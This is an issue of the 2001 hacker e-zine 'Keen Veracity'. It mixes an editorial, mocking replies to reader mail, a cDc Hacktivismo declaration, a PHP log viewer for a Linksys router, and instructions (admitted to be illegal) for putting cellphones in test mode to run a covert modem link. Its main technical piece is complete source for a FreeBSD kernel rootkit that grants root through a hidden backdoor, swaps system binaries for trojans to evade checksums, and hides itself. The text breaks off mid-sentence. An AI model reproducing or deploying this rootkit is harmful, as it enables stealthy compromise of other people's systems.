--------------------------------------------------------------------------------
                        K E E N   V E R A C I T Y
--------------------------------------------------------------------------------
                              I S S U E  (11)
              L e g i o n s  o f  t h e  U n d e r g r o u n d
-------------------------------------------------[www.legions.org]--------------

[LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU]
                     W W W . L E G I O N S . O R G
[LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU]

[CONTENTS]------------------------------------------------------------[CONTENTS]

 [1] Editorial - Digital Ebola
 [2] KV Spam - The Readers
 [3] Cell Shell - Morbid Angel
 [4] Getting the most from a Linksys Cable/DSL Router - pr00f
 [5] Mozarela Kernel Trojan - arkmp
 [6] A Newbies Guide To Sockets in PERL - Beowulf
 [7] Curiosity killed the American Citizen - Firewa11
 [8] Microsoft's OpenSource Policy - Our Elite Spy
 [9] PERL Headache of the Issue - Digital Ebola
[10] Fun with XOSD - Digital Ebola
[11] More PERL Madness - Digital Ebola
[12] CISCO PIX Connection Monitoring - DataShark
[13] Poor Man's Boards - BigGeezer
[14] YAPOTTLK - Lawless
[15] I Got Windows, Now What? - Ntwak0
[16] RIP - pr00f / alkinoos
[17] Anti-Anti-Sniffer Patch - Vecna
[18] The Wait (fiction) - Digital Ebola
[19] Carolyn Does It Again - Anonymous
[20] Love's Freedom - Raschid

[LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU]
                     W W W . L E G I O N S . O R G
[LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU]

[Editorial]======================================================[Digital Ebola]

Hello, and welcome to another late article of Keen Veracity. Oh, boy, is it
ever so late. Months and months in the making, you could say. Ah well, you
know how it is; the economy these days has no true friends. I was lucky: I
survived two layoffs at a dot com, and then got axed in the final blow (100 or
so people went with me). I have most certainly been on my toes. I have watched
the jobs on the net dwindle down to almost nothing, and I am almost kind of
excited: the industry is reshaping itself. Not only reshaping, but those
annoying people who know dick about computers, networks or security (I refer
to one person, and they know who they are) will see themselves ousted for
people that CAN do the work, for people that HAVE paid their dues. Not even a
writing career will save these pathetic know-nothings. And the ones that are
researching, reading, and creating will be the ones that prosper. Hopefully.

It is midnight on July 12th, in this place I call home, on a nice little
street in a nice little suburb of Dallas. Right now, people are preparing for
Defcon. I am torn: I have just started a new job, as a Network Security
Analyst. I MAY make it to Defcon, then again I may not. If I don't, I will next
year, and I have attended the last two conferences. But I still have this
nagging feeling that I should go. I hate that.

Hopefully, this edition of KV will be finished BEFORE Defcon, and everyone may
rejoice. And if I make it to Vegas this year, you can harass me about the
tardiness. =)

I would like to dedicate this issue to several people:

Sierra - I don't know what to say, except RIP.
Texorcist - May you have the time of your life at Defcon, and I wish you the
            best with your wedding.
DataShark - Erm.
Natasha - Hang in there. And try to relax!
Kris - *licks*
Lawless - Pika...Pika...
All of my former ER team. We survived!

And a very special thanks to the Legions crew, and to the contributors to this
issue of Keen Veracity. Now you guys can stop bugging me. =)

[KV Spam]==========================================================[The Readers]

Date: Thu, 5 Jul 2001 23:42:59 -0500
From: Dylan Brennan
To: submit@legions.org
Subject: where are u guys on irc?

where are u guys on irc?

/* We are cloaked. Actually, try Undernet #legions */

Date: Fri, 22 Jun 2001 21:18:26 +0200
From: Vladimir Dimitrijevic
To: submit@legions.org

Dear Legions,
I'm Vladimir Dimitrijevic, Graduated Electrical Engineer, major: Computer
Science, from Serbia. I admire your work with cracks and I plead with you for
help. Some political organization is trying to destroy my Internet cafe by
giving their service for free. I need some hack assistance from you to stop
them.
Thank you.

/* Well, we are TRYING to stay out of world affairs... */

Date: Wed, 13 Jun 2001 13:29:34 EDT
From: Lvthec@aol.com
To: submit@legions.org
Subject: Pearl Harbour Survivor Research

To whom this may concern,
I am doing research on survivors (doctors, nurses, patients, etc.) that were
in the hospitals on Dec. 7th and 8th. My goal is to try and talk to some of the
people. Do you know where I could find records of names that served during
that time period that would be open to the public? If you can help me out or
give me any suggestions to better assist me, it would be most appreciated.
Stewart Flick 474-0501

/* www.google.com - DUH!
*/

Date: Sun, 27 May 2001 19:33:14 -0000
From: Omer Iscimenler
To: submit@legions.org

I'm a boy from Turkey and I really have a big desire to learn about these
things. If you could just show me where to start, or just give me some time to
teach, that would be great. I have a big interest in computers and software
and I have a lot of time, so if you could just tell me where to start I
guarantee you that I will become really good in a few years. Pls help me.
_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

/* I didn't know you could get SPAM from Turkey... Uhh.. just keep reading
   guy... You will get better. I promise. Don't read Microsoft stuff though,
   read about UNIX... UNIX.. You want UNIX... */

Date: Sun, 13 May 2001 19:30:56 -0400
From: DORIS O'ROURKE
To: submit@legions.org
Subject: EMAIL

Will you give email addresses out for free or money?
Thanks

/* For the right amount of money, sexual favors, or alcohol, many of us will
   do almost ANYTHING. I haven't quite decided about email addresses tho. */

Date: Tue, 24 Apr 2001 20:14:25 +0200
From: Ronald Lemmers
To: submit@legions.org
Subject: Worldonline...

Dear Members of Legions of the Underground,
Recently Worldonline (www.worldonline.nl) announced that they have the best
secured mail servers of all Dutch providers... Immediately all the people who
thought they could prove otherwise tried to hack their way into the mail
servers... Because I know people who work there and have access to internal
information, I asked them if someone had already gained access to one of those
email servers at Worldonline... If I am to believe my friends, they say not a
single soul gained access to the mail servers, only the administrators =-) so
it would be fun if you want to try it out... and test those good secure
servers! You can mail Worldonline if they want a challenge... Winner gets
money... they like that kind of thingies you know... because I know the people
who work there have a big influence on the whole company.
Greetz Rarekind!

/* uhhh... I trust people like that, dude */

Date: Sun, 11 Feb 2001 16:18:48 -0000
From: john michael vicente
To: submit@legions.org
Subject: A NEWBIE WHO NEEDS HELP

Hi Legions!!! I've just dropped by your site and really want to be with you. I
know you are the best computer geniuses in the whole wide web, so I thought
you might want to help me to be like you. I admit that I am a newbie who really
needs help from u. Could you please suggest what references, books and sites I
have to take, because I don't know where to start. I want to know everything,
from programming to networking to security, things like that. In short, I want
to be like you guys. I hope you understand my situation, because I hate to be
an ignorant geek. Thanks a lot!!!
john michael

/* Why you mail us? Just go get some books! Use GOOGLE! =) */

Date: Mon, 12 Feb 2001 14:56:25 +0100
From: lars klei
To: submit@legions.org

can you help me get a hotmail password? I don't know where to ask?
LARSKLEI@HOTMAIL.COM (THIS IS MY ACCOUNT)

/* No. We do not support Hotmail. Or ANY Microsoft product. */

Date: Wed, 07 Feb 2001 15:22:48 -0000
From: Brian Johnson
To: submit@legions.org
Subject: i need help

hi there, I've been sending thousands of e.mails to some hackers to help me to
hack some e.mail accounts, but till now no one sent me any reply... i'm really
depressed... plz i need u to help me and send me an easy way to hack.. and
please help me and reply me soon and don't make me wait for nothing ok..
either send me an easy way with the instructions, and it would be better if u
find a way without telling me "send an e.mail to this and write....etc", or u
can help me and i'll send u the e.mail i want to hack.. waiting your reply,
thanks

/* Read! Google! READ! GOOGLE! PROZAC! READ! GOOGLE! */

From: MtororojoS13@aol.com
To: submit@legions.org
Subject: I forgot to say!!!!

TOOLS IS THE BOBM!!!!!!!!!!!!!
.............................::::::::::::::::::::::::::::::::::::::::>>>>>>>>
D@rk Red Ph@ntom

/* Uhhhhhh.. Yeah. */

Date: Sat, 3 Feb 2001 08:10:32 -0800 (PST)
From: Osman Malik
To: submit@legions.org
Subject: RE:Leigons.org

i want to join your haking gruop hoiw do i ? my email is cybermn9@yahoo.com

/* I always wanted to be a haker. */

Date: Wed, 24 Jan 2001 00:41:00 EST
From: Drkphantomangel@aol.com
To: submit@legions.org
Subject: qUiCk QuEsTiOn

would you mind if i put a link to your page on mine cuz i think your page is
the shit. thanks
DrKpHaNtOmAnGeL

/* Sure. Link all you want. */

Date: Thu, 18 Jan 2001 13:36:30 -0500
From: David Schiesl
To: submit@legions.org
Subject: subscribe

/* Noooooooooo. I ain't no major dumb wh0re. */

Date: Sat, 30 Dec 2000 02:22:39 +0100
From: alex
To: submit@legions.org

Hi, I'm a beginner hacker and I want to join your group, to learn more about
hacking... U may have a use for me, cuz I can spend like 15 h with my comp and
I promise u I learn very quick.. I'll do anything to join...

/* Anything? Would you read, graduate high school, and college? */

From: Jonas Lindström
To: submit@legions.org
Subject: membership

hey how do i get a membership?
For Your Eyes Only
Mvh: Jonas

/* Pay me money. */

Date: Thu, 28 Dec 2000 04:41:23 -0500 (EST)
From: blackstone reche
To: submit@legions.org
Subject: suscribe group

Hi, I'm Blackstone. I visited some of your hacked sites. I love how you broke
into the racist web site. I don't like people who want white power. I'm a
black man and nothing can change this; we are all the same people. Bye.
+++++++++++++++++++++++++++++++
i speak french but i know some english

/* I speak english, but I know some french... */

Date: Mon, 25 Dec 2000 14:19:43 -0500 (EST)
From: chris
To: submit@legions.org
Subject: Joining

I have what it takes to be one of you and then some. Believe me when I tell
you that. I can take care of anything you need done.
-Zer0kewL

/* Good. Start with my laundry, and then wash my car. */

Date: Thu, 5 Jul 2001 09:45:37 -0700 (PDT)
From: Grandmaster Ratte'
To: yermomma@cultdeadcow.com
Cc: /* Omitted, cause DAMN, thats alot of addresses */
Subject: cDc Msg Of Hope-July 4

                 _   _
                ((___))        cDc communications
                [ x x ]        & HACKTIVISMO
                 \   /         "A Special Message of Hope"
                 (' ')         July 4th, 2001
                  (U)          FOR IMMEDIATE RELEASE

INTERNATIONAL BOOKBURNING IN PROGRESS

[July 4, 2001 - LUBBOCK, TX.] Free speech is under siege at the margins of the
Internet. Quite a few countries are censoring access to the Web through DNS
[Domain Name Service] filtering. This is a process whereby politically
incorrect information is blocked by domain address -- the name that appears
before the dot com suffix. Others employ filtering which denies politically or
socially challenging subject matter based on its content.

Hacktivismo and the CULT OF THE DEAD COW have decided that enough is too much.
We are hackers and free speech advocates, and we are developing technologies
to challenge state-sponsored censorship of the Internet.

Most countries use intimidation and filtering of one kind or another,
including the Peoples Republic of China, Cuba, and many Islamic countries.
Most claim to be blocking pornographic content. But the real reason is to
prevent challenging content from spreading through repressive regimes. This
includes information ranging from political opinion, "foreign" news, women's
issues, academic and scholarly works, religious information, information
regarding ethnic groups in disfavor, news of human rights abuses, documents
which present drugs in a positive light, and gay and lesbian content, among
others.

The capriciousness of state-sanctioned censorship is wide-ranging. [1]

* In Zambia, the government has attempted to censor information revealing
  their plans for constitutional referendums.
* In Mauritania -- as in most countries -- owners of cybercafes are required
  to supply government intelligence agents with copies of e-mail sent or
  received at their establishments.

* Even less draconian governments, like Malaysia, have threatened
  web-publishers for violating their publishing licenses by publishing
  frequent updates: _timely, relevant_ information is seen as a threat.

* South Korea's national security law forbids South Koreans from having any
  contact -- including contact over the Internet -- with their North Korean
  neighbors.

* Sri Lanka threatened news sites with possible revocation of their licenses
  if coverage of a presidential election campaign was not partial to the party
  of the outgoing president.

The risks of accessing or disseminating information are often great.

* In Ukraine, a decapitated body found near the village of Tarachtcha is
  believed to be that of Georgiy Gongadze, founder and editor of an on-line
  newspaper critical of the authorities.

* In August, 1998, eighteen year old Turk Emre Ersoz was found guilty of
  "insulting the national police" in an Internet forum after participating in
  a demonstration that was violently suppressed by the police. His ISP
  provided the authorities with his address.

* Journalist Miroslav Filipovic has the dubious distinction of having been the
  first journalist accused of spying because of articles published on the
  Internet -- in this case detailing the abuses of certain Yugoslav army units
  in Kosovo.

We are sickened by these egregious violations of information and human rights.
The liberal democracies have talked a far better game than they've played on
access to information. But hackers are not willing to watch the custodians of
the International Convention on Civil and Political Rights and the Universal
Declaration of Human Rights turn them into a mockery. We are willing to put
our money where our mouth is.

Hacktivismo and the CULT OF THE DEAD COW are issuing the HACKTIVISMO
DECLARATION as a declaration of outrage and a statement of intent. It is our
Magna Carta for information rights. People have a right to reasonable access
of otherwise lawfully published information. If our leaders aren't prepared to
defend the Internet, we are.

---------------------------------------------------------------------
[1] some information cited in this press release was either paraphrased, or
    quoted directly, from the "Enemies of the Internet" report published by
    Reporters Without Frontiers, and may be found at http://www.rsf.fr

/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>

THE HACKTIVISMO DECLARATION
assertions of liberty in support of an uncensored internet

DEEPLY ALARMED that state-sponsored censorship of the Internet is rapidly
spreading with the assistance of transnational corporations,

TAKING AS A BASIS the principles and purposes enshrined in Article 19 of the
Universal Declaration of Human Rights (UDHR) that states, _Everyone has the
right to freedom of opinion and expression; this right includes freedom to
hold opinions without interference and to seek, receive and impart information
and ideas through any media and regardless of frontiers_, and Article 19 of
the International Covenant on Civil and Political Rights (ICCPR) that says,

  1. Everyone shall have the right to hold opinions without interference.
  2. Everyone shall have the right to freedom of expression; this right shall
     include freedom to seek, receive and impart information and ideas of all
     kinds, regardless of frontiers, either orally, in writing or in print, in
     the form of art, or through any other media of his choice.
  3. The exercise of the rights provided for in paragraph 2 of this article
     carries with it special duties and responsibilities. It may therefore be
     subject to certain restrictions, but these shall only be such as are
     provided by law and are necessary:
     (a) For respect of the rights or reputations of others;
     (b) For the protection of national security or of public order, or of
         public health or morals.

RECALLING that some member states of the United Nations have signed the ICCPR,
or have ratified it in such a way as to prevent their citizens from using it
in courts of law,

CONSIDERING that such member states continue to willfully suppress
wide-ranging access to lawfully published information on the Internet, despite
the clear language of the ICCPR that freedom of expression exists in all
media,

TAKING NOTE that transnational corporations continue to sell information
technologies to the world's most repressive regimes knowing full well that
they will be used to track and control an already harried citizenry,

TAKING INTO ACCOUNT that the Internet is fast becoming a method of repression
rather than an instrument of liberation,

BEARING IN MIND that in some countries it is a crime to demand the right to
access lawfully published information, and of other basic human rights,

RECALLING that member states of the United Nations have failed to press the
world's most egregious information rights violators to a higher standard,

MINDFUL that denying access to information could lead to spiritual,
intellectual, and economic decline, the promotion of xenophobia and
destabilization of international order,

CONCERNED that governments and transnationals are colluding to maintain the
status quo,

DEEPLY ALARMED that world leaders have failed to address information rights
issues directly and without equivocation,

RECOGNIZING the importance to fight against human rights abuses with respect
to reasonable access to information on the Internet,

THEREFORE WE ARE CONVINCED that the international hacking community has a
moral imperative to act, and we DECLARE:

* THAT FULL RESPECT FOR HUMAN RIGHTS AND FUNDAMENTAL FREEDOMS INCLUDES THE
  LIBERTY OF FAIR AND REASONABLE ACCESS TO INFORMATION, WHETHER BY SHORTWAVE
  RADIO, AIR MAIL, SIMPLE TELEPHONY, THE GLOBAL INTERNET, OR OTHER MEDIA.

* THAT WE RECOGNIZE THE RIGHT OF GOVERNMENTS TO FORBID THE PUBLICATION OF
  PROPERLY CATEGORIZED STATE SECRETS, CHILD PORNOGRAPHY, AND MATTERS RELATED
  TO PERSONAL PRIVACY AND PRIVILEGE, AMONG OTHER ACCEPTED RESTRICTIONS. BUT WE
  OPPOSE THE USE OF STATE POWER TO CONTROL ACCESS TO THE WORKS OF CRITICS,
  INTELLECTUALS, ARTISTS, OR RELIGIOUS FIGURES.

* THAT STATE SPONSORED CENSORSHIP OF THE INTERNET ERODES PEACEFUL AND
  CIVILIZED COEXISTENCE, AFFECTS THE EXERCISE OF DEMOCRACY, AND ENDANGERS THE
  SOCIOECONOMIC DEVELOPMENT OF NATIONS.

* THAT STATE-SPONSORED CENSORSHIP OF THE INTERNET IS A SERIOUS FORM OF
  ORGANIZED AND SYSTEMATIC VIOLENCE AGAINST CITIZENS, IS INTENDED TO GENERATE
  CONFUSION AND XENOPHOBIA, AND IS A REPREHENSIBLE VIOLATION OF TRUST.

* THAT WE WILL STUDY WAYS AND MEANS OF CIRCUMVENTING STATE SPONSORED
  CENSORSHIP OF THE INTERNET AND WILL IMPLEMENT TECHNOLOGIES TO CHALLENGE
  INFORMATION RIGHTS VIOLATIONS.

Issued July 4, 2001 by Hacktivismo and the CULT OF THE DEAD COW.

Relevant Web Links:

  Universal Declaration of Human Rights
    http://www.un.org/Overview/rights.html
  International Covenant on Civil and Political Rights
    http://www.unhchr.ch/html/menu3/b/a_ccpr.htm
  Reporters Without Frontiers
    http://www.rsf.fr
  CULT OF THE DEAD COW
    http://www.cultdeadcow.com

== Media Contact:
   Oxblood Ruffin
   Foreign Minister
   CULT OF THE DEAD COW
   oxblood@cultdeadcow.com
   http://cultdeadcow.com

   -cDc- CULT OF THE DEAD COW -cDc-   Est. 1984
   NINJA STRIKE FORCE * HACKTIVISMO

####

We will have more to say.

/* We gotz your back, dead cow brothers. */

==============================================================================
Got a news story? Send it to editor@legions.org - We are working to put up a
semi cool news site, and it would be most excellent of each and every one of
you to send us news stories and links.
==============================================================================

[Cell Shell]======================================================[Morbid Angel]

This hasn't been fully tested (I've only tested the shell portion; it's up to
you to try out the PPP connection. In theory it should work, but it's going to
be really slow). And be forewarned: this is illegal. Everything you do based on
this is your choice, not mine. I am only supplying information, and I am not
responsible for your actions. If the FCC comes a-knocking, don't be bitching
to me or LoU about your legal engagements. It is your fault if you get caught
doing any of the below in practice. Not mine.

The idea came to me a few months ago when I was in my friend's car, wishing
that I could nab a few files off my system while we were on the road. It
completely dawned on me a few minutes later when I was playing with my Motorola
2800 bagphone. I had to find a way to make a network connection to my main
server back at my (old) house, and I figured cellular communication was the
way to go.

I went home later that day and dug around my box full of (mostly) various
electronics and phone equipment. I found an old US Robotics 28.8 external
modem, an RJ-11 -> Motorola TeleTAC adapter (for modems, duh) and my old
acoustic coupler. I threw the external modem on my server, then ran some RJ11
to the adapter, and connected the adapter to the TeleTAC. Whee. Now, client
side, I popped the coupler onto the 2800, then connected it to my amazing 14.4
on the lappy. Now how the fuck did I establish the goddamn connection? This is
going to be a bit lengthy, so let's list it out.

1) I edited my inittab (/etc/inittab) and added a dialup term. (You can find
   it.)

2) Popped both cellphones into test mode. Nothing like FCN-00-**-83786633-STO.
   Then I popped them onto an unused channel, and then (gasp) put them into
   Rx/Tx mode by doing the following:

     a) 08#
     b) 10#
     c) 05#
     d) 353#

   Oh my. I think we can hear ourselves talk over the channel. Isn't that
   special?

3) On the external modem, I threw a switch that said 'Auto Answer'. Now, I
   realize this isn't on all externals, and I recommend that you find one,
   whether it's at a Goodwill or a vintage computer store.

4) Started minicom on the laptop and typed in the magical string, ATD.

Boom. That's all it took. I got an amazing 19.2 connection over the cellular
link. Now, could you get a higher connection with faster modems? No, dumb ass.
You can probably get a 28.8 connection, but it will most likely time out. Now,
unless you have some really old towers around your area that actually forward
channels through different towers (i.e. you're driving down the road, you're
out of the original tower's range, then you switch over), you're going to get
disconnected when you pass the limited range of your tower, which is anywhere
between 6 and 10 miles. There are only a couple of ways around that, but I'm
sure you can figure them out within a few hours, minutes, or seconds from now.

Okay, so you have yourself a cellular shell. Whoop dee doo. Now if you could
actually make a networked connection over the link, that would be nice, eh?
Well, using the wonderful PPP protocol, we can! Add a new user on your host;
name it whatever the fuck you want. Now, for the shell, make sure it's
/usr/sbin/pppd. Make a new file in your favorite editor called .ppprc and put
it in the user's $HOME. Put the following in it:

  connect -detach modem crtscts lock :192.168.100.4

(pppd's connect option normally takes a chat script as its argument; as written
above the line is incomplete, so check pppd(8) before relying on it.)

Whoop, there it is. Now on the client side, make a ppp script that logs in as
that user. And that's all she wrote. It should work, but I make no guarantees
whatsoever, since I never tested it. So play around with it, if you dare.
Mail me some followups, additions, and so on; also, I'd like to hear some new
ideas to add to this simple project. Next time, I'll get in depth with more
wireless networking projects for your geeky enjoyment.

[LinkSys DSL Router]=====================================================[pr00f]

A few months back I bought a 4-port Linksys cable/DSL router (model BEFSR41)
for a quick and easy way of sharing my broadband connection between the boxen
on my network. At the time I was more concerned with reliability than feature
set, and from past experience I'd come to know Linksys as a reliable vendor
(up until recently, but we won't get into that).

Anyway, a few weeks ago I was playing with the various settings on the router
and noticed the logging options. Looking at the manual, I couldn't find
anything about this function; in fact, the screen shots in the manual didn't
even show the Log tab. Apparently they added the logging functionality in a
firmware update and I'd missed the change. Looking on Linksys' web site didn't
help either, so I decided to do some of my own research.

When you log into the router's web-based administration utility, you'll see
the Log tab second from the right. Clicking on it gives you a couple of
options: enable/disable access logging, and a local IP address to send the log
to. Without documentation this was going to be interesting. So, I entered the
IP address of one of my Linux boxen and submitted the changes. I then asked a
friend to telnet to me, just to see what kind of activity the router would
produce and send to the box. An SNMP trap is sent to the box. Logical enough.
The trap contains the direction of the traffic, either @in or @out, the IP
address of the source, and the IP address of the destination. Not exactly the
most useful logging feature in existence, but it'll do the trick for simple
monitoring of network activity to and from the Internet.
The next thing I did was set up snmptraplogd to capture the traps from the
router. This gave me a decent log of the day's events. Since the traps are
plain SNMP over UDP, anything on the LAN can forge one and plant a line in the
log, so filter UDP/162 on the log host so that only the router's LAN address
can reach it. I proceeded to write a short PHP script to parse the log in real
time, providing a convenient way to monitor the logs. Here's the PHP code I'm
using:

--- BEGIN SNIP ---
<?php
// Which traffic to show: All, Blocked, Incoming or Outgoing. The value comes
// from the query string (?filter=...) and is echoed back into the page, so it
// is checked against a fixed list first; otherwise this is a reflected XSS.
$allowed = array("All", "Blocked", "Incoming", "Outgoing");
$filter = isset($_GET["filter"]) ? $_GET["filter"] : "All";
if (!in_array($filter, $allowed, true))
    $filter = "All";

print("[ <a href=\"?filter=All\">All</a> | ");
print("<a href=\"?filter=Blocked\">Blocked</a> | ");
print("<a href=\"?filter=Incoming\">Incoming</a> | ");
print("<a href=\"?filter=Outgoing\">Outgoing</a> ]<br>\n");
print("<b>$filter Traffic</b><br>\n");

// Make sure the log is readable by Apache (usually www-data)
$filepointer = fopen("/var/log/snmptrapd.log", "r");
if (!$filepointer)
    die("cannot open /var/log/snmptrapd.log");

while (!feof($filepointer)) {
    $fileline = fgets($filepointer, 1024);
    if (strlen($fileline) == 0)
        continue;

    // Each line starts with a timestamp laid out as YYYYMMDD<sep>HHMMSS, and
    // the router's payload begins at the "@" (@in / @out):
    //   "@in <src ip> <src port> <dst ip> <dst port>"
    $spaceloc   = strpos($fileline, " ");
    $timedate   = substr($fileline, 0, $spaceloc);
    $messageloc = strpos($fileline, "@");
    if ($messageloc <= 0)
        continue;

    $message = substr($fileline, $messageloc, strlen($fileline) - $messageloc - 3);
    $year   = substr($timedate, 0, 4);
    $month  = substr($timedate, 4, 2);
    $day    = substr($timedate, 6, 2);
    $hour   = substr($timedate, 9, 2);
    $minute = substr($timedate, 11, 2);
    $second = substr($timedate, 13);
    $date   = "$month/$day/$year";
    $time   = "$hour:$minute:$second";
    $type   = substr($message, 0, 2);   // "@i" or "@o"
    $parts  = explode(" ", $message);
    $line   = "$date $time - $parts[1]:$parts[2] > $parts[3]:$parts[4]<br>\n";

    if ($filter == "All") {
        print($line);
    } elseif ($filter == "Incoming") {
        if ($type == "@i" && $parts[3] != "router")
            print($line);
    } elseif ($filter == "Outgoing") {
        if ($type == "@o")
            print($line);
    } elseif ($filter == "Blocked") {
        // CHANGE THIS -- 24.x.x.x should be your router's external IP address
        if ($type == "@i" && $parts[3] == "24.x.x.x")
            print("$date $time - $parts[1]:$parts[2] > router:$parts[4]<br>\n");
    }
}
fclose($filepointer);
?>
--- END SNIP ---

[Mozarela Kernel Trojan]=================================================[arkmp]

            -- M O Z A R E L A   K E R N E L   T R O J A N --
                         -- for FreeBSD 4.x --

Hi. Other info about kernel loadable modules under FreeBSD can be found at
http://www.thehackerschoice.com in Pragmatic's tutorial. We usually see Linux
rootkits implemented as kernel modules, but for FreeBSD 4.x nothing of the
kind has ever been coded. This code (after the code you will find some
explanation) is a simple FreeBSD rootkit named "mozarela" with a few
functions.

------------------------------------------------- cut here -----------
/*
 * Header list reconstructed: the original names were lost when the listing
 * was extracted. These are the FreeBSD 4.x headers the code below needs.
 */
#include <sys/types.h>
#include <sys/param.h>
#include <sys/errno.h>
#include <sys/proc.h>
#include <sys/ucred.h>
#include <sys/module.h>
#include <sys/sysent.h>
#include <sys/kernel.h>
#include <sys/systm.h>
#include <sys/syscall.h>
#include <sys/sysproto.h>
#include <sys/linker.h>

/*
 * $mozarela coded 26/01/2001 - some parts of the code and ideas are from
 * vecna@s0ftpj.org and his "spapem" (anti securelevel project)
 * http://www.s0ftpj.org; some info is from "Attacking FreeBSD with kernel
 * modules" by Pragmatic (THC) http://www.thehackerschoice.com
 */

#define MOD_NAME "mozarela.ko"

struct couple {
	char oldexec[32];
	char newexec[32];
};

static int super_power, mozarela_warn;
static void check_dirname(struct proc *, char *, int);

/* chdir(2) hook: "cd *CC" arms the kill(2) backdoor (see check_dirname) */
static int
mozarela_chdir(struct proc *p, struct chdir_args *uap)
{
	check_dirname(p, uap->path, strlen(uap->path));
	return chdir(p, uap);
}

/* kill(2) hook: once armed, signal 31 turns the target process into root */
static int
mozarela_kill(struct proc *p, struct kill_args *uap)
{
	if (super_power && uap->signum == 31) {
		struct proc *magic;

		if (!(magic = pfind(uap->pid)))
			return ESRCH;
		magic->p_cred->pc_ucred->cr_uid = 0;
		magic->p_cred->p_ruid = 0;
		magic->p_cred->p_svuid = 0;
		magic->p_cred->p_rgid = 0;
		magic->p_cred->p_svgid = 0;	/* the original wrote p_svuid twice */
		super_power = 0;
		return (0);
	}
	return kill(p, uap);
}

/* execve(2) hook: swap the requested path for the trojan listed in execred */
static int
mozarela_execve(struct proc *p, struct execve_args *uap)
{
	if (uap->fname != NULL) {
		static struct couple execred[3] = {
			{ "/bin/ls", "/dev/a" },
			{ "/bin/su", "/dev/b" },
			{ "/bin/rm", "/dev/c" }
			/*
			 * READ READ READ READ the article before ANY CHANGE: if
			 * you put a second name bigger than the first you may
			 * cause a kernel panic
			 */
		};
		int size = sizeof(execred) / sizeof(struct couple);

		/* "size > 0": the original's ">= 0" read execred[-1] last */
		while (size > 0) {
			if (!strcmp(execred[--size].oldexec, uap->fname)) {
				/* copy the new name and its NUL, not all 32 bytes */
				memcpy(uap->fname, execred[size].newexec,
				    strlen(execred[size].newexec) + 1);
			}
		}
	}
	return execve(p, uap);
}

/* kldstat(2) hook: remember the pid of whoever asked about this module... */
static int
mozarela_kldstat(struct proc *p, struct kldstat_args *uap)
{
	int ret = kldstat(p, uap);

	if (!ret && uap->stat->name != NULL)
		if (!strcmp(uap->stat->name, MOD_NAME))
			mozarela_warn = p->p_pid;
	return ret;
}

/* ...and turn that process's next write(2) into a zero-length write */
static int
mozarela_write(struct proc *p, struct write_args *uap)
{
	if (mozarela_warn && mozarela_warn == p->p_pid)
		mozarela_warn = uap->nbyte = 0;
	return write(p, uap);
}

/* replacement sysent entries: { argument count, handler } */
static struct sysent mozarela[5] = {
	{ 1, (sy_call_t *)mozarela_chdir },
	{ 2, (sy_call_t *)mozarela_kill },
	{ 3, (sy_call_t *)mozarela_execve },
	{ 3, (sy_call_t *)mozarela_write },
	{ 2, (sy_call_t *)mozarela_kldstat }
};

static int
init_module(module_t mod, int cmd, void *arg)
{
	int ret = 0;

	switch (cmd) {
	case MOD_LOAD:
		sysent[SYS_chdir] = mozarela[0];
		sysent[SYS_kill] = mozarela[1];
		sysent[SYS_execve] = mozarela[2];
		sysent[SYS_write] = mozarela[3];
		sysent[SYS_kldstat] = mozarela[4];
		uprintf("mozarela loadated\n");
		break;
	case MOD_UNLOAD:
		sysent[SYS_chdir].sy_call = (sy_call_t *)chdir;
		sysent[SYS_kill].sy_call = (sy_call_t *)kill;
		sysent[SYS_execve].sy_call = (sy_call_t *)execve;
		sysent[SYS_write].sy_call = (sy_call_t *)write;
		sysent[SYS_kldstat].sy_call = (sy_call_t *)kldstat;
		break;
	default:
		ret = EINVAL;
		break;
	}
	return (ret);
}

static struct moduledata mozarela_moddata = {
	"mozarela",
	init_module,
	NULL
};

DECLARE_MODULE(syscall, mozarela_moddata, SI_SUB_DRIVERS, SI_ORDER_MIDDLE);

static void
check_dirname(struct proc *p, char *dir, int len)
{
	if (len != 3)
		return;
	/*
	 * "cd \*CC" can activate the kill trojan
	 */
	if (dir[0] == '*' && dir[1] == 'C' && dir[2] == 'C')
		super_power++;
}
------------------------------------------------- cut here -----------

In this code we redirect the following
system call: chdir kill execve write kldstat sometime chdir is used for change working directory, kill for send signal to a process, execve for execute executable file, write for any writing procedure (file socket standard output ...) kldstat to see started module. this kld have this special abilities: 1) change uid/gid/euid/egid to root to specificated process. 2) make exec redirection, you may put some troian under /usr/share/man9/CVS/ or other directory and redir execution ... example ... if you want execute your login troian usually copy your troian over /bin/login, but a checksum checker can discover it (because the md5sum of file is been changed) with this system you may put new binary and execute this also keeping original binary file :) 3) make hiding self. other implementation if think that are superflue, because with execve redir you may truly make anything... if you want hide your files i can code redirection of getdirentries(2) or getdents(2) but is more easy and lower dangerous put you ls trojan and redir execution, some for login, w, netstat and others, on /usr/src/ you may find all freebsd source is very simple change it for various pourpose :) -- L I T T L E K L D I N F O -- The kld can modify ANY block of kernel, btw sometimes kld redir syscall or cdevsw functions, or other simple pointer to function on linked file. If you want make an idea with ALL syscall that you can redir, you can see /usr/src/sys/sys/syscall.h, you can search how system call is used whit /usr/share/man/man2/* man pages and with utility ktrace and kdump you may find how syscall is used under program (if you don't want grep on the code or if code use a wrapper) with # ktrace ./code args args # kdump | more and read all system call used during execution. 
I don't explain the internals of coding in kernel space under FreeBSD, but any
system call can be redirected as a function pointer; as arguments every system
call takes:

    function_name(struct proc *, struct [system_call_name]_args *);

In [system_call_name]_args you find the arguments passed from userspace...
e.g. kill(2) has the prototype kill(int, int); the kill_args struct is a struct
with 2 ints declared inside. Usually, to find the original code, I use

    grep [system_call_name]_args /usr/src/sys/kern/*.c

This info can help you understand the kld functions; the answer to any other
question can be found in the kernel source. If you want to hack this simple
kld, two or three hours of hacking can solve your problem. If you want to be a
kernel hacker, I suggest subscribing to freebsd-hackers@FreeBSD.ORG via
